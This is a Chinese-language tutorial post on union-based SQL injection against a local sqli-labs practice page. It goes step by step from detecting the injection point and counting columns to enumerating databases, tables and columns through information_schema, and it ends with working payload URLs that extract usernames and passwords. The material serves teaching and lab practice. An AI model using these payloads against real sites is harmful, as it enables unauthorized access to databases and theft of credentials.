SQL注入之联合查询注入

大家好，又见面了，我是你们的朋友全栈君。

联合查询注入利用的前提

前提条件：页面上有显示位

什么是显示位？

在一个在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数 据展示在页面中，这个展示数据的位置就叫显示位

联合注入的过程

1、判断注入点

2、判断是整型还是字符型

3、判断查询列数
4、判断显示位
5、获取所有数据库名
6、获取数据库所有表名
7、获取字段名

8、获取字段中的数据

一、判断注入点

我们在可能存在SQL注入变量的后边添加以下payload：

and 1=1 / and 1=2 回显页面不同(整形判断) 

单引号判断‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断) 

 \ (转义符) 

-1/+1 回显下一个或上一个页面(整型判断)

注：加号‘+’在URL中有特殊含义，因此在需要对其进行URL编码为%2b

二、判断是整型还是字符型

输入and 1=1和and 1=2后发现页面没有变化，判断不是整型注入

输入’ and 1=1 %23和 ‘ and 1=2%23后发现页面变化，判断为字符注入 

为什么输入 1 and 1=1 和 1 and 1=2 能判断是否是整型注入尼？

在数据库中 1=1 和1=2  后面随便输入字符串（相当于1=1和1=2后面的查询语句），发现select 1=”1dasd”时返回1正确，1=”2dasd”时返回0错误，即select在查询时忽略后面的字符串，只让1和后面第一个数字对比，如果相等就是正确，不相等返回错误。

三、判断查询列数

order by 函数是对MySQL中查询结果按照指定字段名进行排序，除了指定字 段名还可以指定字段的栏位进行排序，第一个查询字段为1，第二个为2，依次 类推。我们可以通过二分法来猜解列数

输入 order by 4%23  发现页面错误，说明没有4列

输入3列时，页面正常，说明有3列

四、判断显示位

UNION的作用是将两个select查询结果合并，如下图所示：

程序在展示数据的时候通常只会取结果集的第一行数据，看一下源码，mysql_fetch_array只被调用了一次，而mysql_fetch_array从结果集中取得一行作为关联数组或数字数组或二者兼有，具体看第二个参数是什么。所以这里无论怎么折腾最后只会出来第一行的查询结果。

只要让第一行查询的结果是空集，即union左边的select子句查询结果为空，那么union右边的查询结果自然就成为了第一行，打印在网页上了

可以看到将uid改为-1后第二行打印在页面上。

使union前面的语句报错，执行后面的，爆出显示位，2，3

五、获取所有数据库名

group_concat()一次性显示： 

select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

显示当前数据库： databas()

六、获取表名

http://127.0.0.1/sql/Less-1/?id=-1′ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’security’),3%23

七、获列名

http://127.0.0.1/sql/Less-1/?id=-1′ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’),3%23

八、获取列中的信息

http://127.0.0.1/sql/Less-1/?id=-1′ union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3%23 

用limit控制，一行行得到数据